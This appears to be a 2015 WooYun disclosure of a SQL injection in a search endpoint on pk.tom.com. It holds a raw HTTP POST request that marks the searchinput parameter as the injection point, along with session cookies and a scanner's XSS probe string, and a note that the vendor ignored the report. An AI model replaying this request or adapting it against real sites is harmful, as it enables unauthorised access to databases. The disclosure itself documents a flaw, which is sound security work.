2015-09-16: Details reported to the vendor; awaiting vendor handling
2015-09-21: The vendor chose to ignore the vulnerability; details disclosed to the public
POST /web/partyview.do?cmd=searchlist&pageNumber=1 HTTP/1.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://pk.tom.com:80/
Cookie: JSESSIONID=abcmtvxBcNZAjaN3wOp-u; Hm_lvt_e68f6e0719b540422cb1660628b45778=1442297746,1442297783,1442297818,1442297964; Hm_lpvt_e68f6e0719b540422cb1660628b45778=1442297964; HMACCOUNT=4EB7B87E9634844B; _pk_ref.5.d0c4=%5B%22%22%2C%22%22%2C1442297524%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.5.d0c4=2cd56feaf9e1ab95.1442297524.1.1442297819.1442297524.; _pk_ses.5.d0c4=*; tom_test=Mlfvjie4o!1!1!1442297511!1442297511!1!0!http://pk.tom.com/web/register.jsp!; nickname=; partyname=%E7%A5%9E%E5%9F%9F%E9%97%A8%E5%8D%AB; partyid=39
Host: pk.tom.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

searchinput=%c7%eb%ca%e4%c8%eb%b9%ab%bb%e1%c3%fb%b3%c6%b9%d8%bc%fc%d7%d6*&sewd=
The searchinput parameter is the injection point.
Severity: No impact (ignored by vendor)
Ignored on: 2015-09-21 23:26
Vulnerability Rank: 4 (WooYun rating)
None yet